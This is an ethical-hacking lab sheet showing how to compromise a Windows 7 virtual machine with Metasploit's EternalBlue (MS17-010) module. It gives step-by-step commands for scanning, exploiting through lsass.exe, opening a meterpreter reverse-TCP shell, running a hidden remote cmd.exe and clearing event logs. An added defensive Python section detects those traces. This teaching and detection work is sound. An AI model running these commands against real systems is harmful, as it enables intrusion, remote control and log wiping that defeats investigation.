Uploaded by Ankit Dixit

metasploit

Title
Write a program for exploiting NetBIOS vulnerability.
Aim
To exploit Windows 7 by using EternalBlue
Theory: NetBIOS (Network Basic Input/Output System) is a program that allows applications
on different computers to communicate within a local area network (LAN). NetBIOS
services also provide vital information about the target and help us uncover the target
architecture, operating system version, and many other things.
NetBIOS provides communication services on local networks.
Metasploit
Metasploit is a penetration testing framework that makes hacking simple. It's an
essential tool for many attackers and defenders.
Metasploit Framework
The basic steps for exploiting a system using the Framework include:
1. Optionally checking whether the intended target system is vulnerable to an
exploit.
2. Choosing and configuring an exploit (code that enters a target system by
taking advantage of one of its bugs; about 900 different exploits
for Windows, Unix/Linux and Mac OS X systems are included).
3. Choosing and configuring a payload (code that will be executed on the target
system upon successful entry; for instance, a remote shell or a VNC server).
Metasploit often recommends a payload that should work.
4. Choosing the encoding technique so that hexadecimal opcodes known as "bad
characters" are removed from the payload; these characters would cause the
exploit to fail.
5. Executing the exploit.
EternalBlue
The worldwide WannaCry ransomware used this exploit to attack
unpatched computers on May 12, 2017.
17 YCT 512 - Ethical Hacking Fundamentals Lab
Procedure:
Requirements:
• Kali Linux
• Windows 7
• Virtual Box
• Metasploit tool
Step-1=> To check the IP address of your Kali Linux virtual machine, use the terminal prompt ~ ifconfig
Step-2=> To check the IP address of the victim machine, use the cmd prompt ~ ipconfig
Step-3=> To start Metasploit, use command ~ msfconsole -q
Step-4=> Search for vulnerability ms17_010
Step-5=> Use module 1 ~ auxiliary/scanner/smb/smb_ms17_010
Step-6=> After selecting the module, use command ~ show options
Step-7=> Set RHOSTS to the victim's IP address, i.e. ~ 10.0.2.6
Step-8=> Use command ~ exploit and check the result.
Step-9=> Now use module 2 ~ exploit/windows/smb/ms17_010_eternalblue
Step-10=> Use Command ~ show options
Step-11=> Use command ~ set RHOST followed by the victim's IP address, i.e. ~ 10.0.2.6
Step-12=> Now we will create a process, so use command ~ set ProcessName lsass.exe
Step-13=> Use command ~ show payloads for a list of payloads and use payload ~ windows/meterpreter/reverse_tcp
Step-14=> Now set LHOST to the IP address of the listener host (10.0.2.4)
Step-15=> As the final step, use command ~ exploit and hit enter
Step-16=> Check the status of the attack; this figure shows "win", which means the attack is successful…
Step-17=> After the attack is successful, we have full control of the victim's machine, so we can use command ~ sysinfo to get info regarding the built….
Step-18=> In the meterpreter shell we can use command ~ getuid to know the user's identity
Step-19=> Using the meterpreter shell we can also check the process that we created in step 12, which is running on the victim's machine…
Step-20=> We can also use the command prompt of the victim's machine using command ~ execute -f cmd.exe -i -H
Step-21=> With the use of the command prompt we can open notepad remotely and can also delete Windows logs using command ~ clearev
Step-22=> This image shows that notepad was opened remotely…
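Seen from the defender's side, the steps above leave recognizable traces, assuming the payload runs inside lsass.exe as set in step 12: an outbound connection from lsass.exe to the listener (step 14), a cmd.exe spawned by lsass.exe (step 20) and cleared event logs (step 21). The following added example, which is not part of the original lab sheet, triages simplified event records for those traces; the record layout, host names, the domain-controller allowlist and the rule names are assumptions for illustration, while event IDs 1102 and 104 (log cleared) and Sysmon IDs 1 and 3 are the real ones.

```python
from ntpath import basename

SYS = "C:\\Windows\\System32\\"
SHELLS = {"cmd.exe", "powershell.exe"}
LOG_CLEARED = {("Security", 1102), ("System", 104)}  # audit log / event log cleared
KNOWN_DCS = {"10.0.2.10"}  # constructed allowlist of domain controllers

# Constructed sample events (simplified layout, field names borrowed from Sysmon 1/3;
# 10.0.2.4 is the lab's listener address, every other value is made up).
EVENTS = [
    {"t": 1, "host": "WIN7-LAB", "channel": "Sysmon", "id": 3,
     "Image": SYS + "lsass.exe", "DestinationIp": "10.0.2.10"},
    {"t": 2, "host": "WIN7-LAB", "channel": "Sysmon", "id": 3,
     "Image": SYS + "lsass.exe", "DestinationIp": "10.0.2.4"},
    {"t": 3, "host": "WIN7-LAB", "channel": "Sysmon", "id": 1,
     "ParentImage": SYS + "lsass.exe", "Image": SYS + "cmd.exe"},
    {"t": 4, "host": "WIN7-LAB", "channel": "Sysmon", "id": 1,
     "ParentImage": SYS + "cmd.exe", "Image": SYS + "notepad.exe"},
    {"t": 5, "host": "WIN7-LAB", "channel": "Security", "id": 1102},
    {"t": 6, "host": "WIN7-LAB", "channel": "System", "id": 104},
    {"t": 7, "host": "FILESRV", "channel": "System", "id": 104},
]

def name(path):
    return basename(path or "").lower()

def classify(ev):
    """Return the rule name an event matches, or None."""
    key = (ev["channel"], ev["id"])
    if key in LOG_CLEARED:
        return "log_cleared"
    if (key == ("Sysmon", 1) and name(ev.get("ParentImage")) == "lsass.exe"
            and name(ev.get("Image")) in SHELLS):
        return "shell_from_lsass"
    if (key == ("Sysmon", 3) and name(ev.get("Image")) == "lsass.exe"
            and ev.get("DestinationIp") not in KNOWN_DCS):
        return "lsass_unexpected_outbound"
    return None

def triage(events):
    """Map host -> ordered rule hits; escalate hosts where log clearing follows lsass abuse."""
    hits, escalate = {}, set()
    for ev in sorted(events, key=lambda e: e["t"]):
        rule, seen = classify(ev), hits.get(ev["host"], [])
        if rule == "log_cleared" and any(r != "log_cleared" for r in seen):
            escalate.add(ev["host"])
        if rule:
            hits.setdefault(ev["host"], []).append(rule)
    return hits, escalate
```

Rules like these belong on events forwarded to a central collector, since step 21 clears the logs on the machine itself.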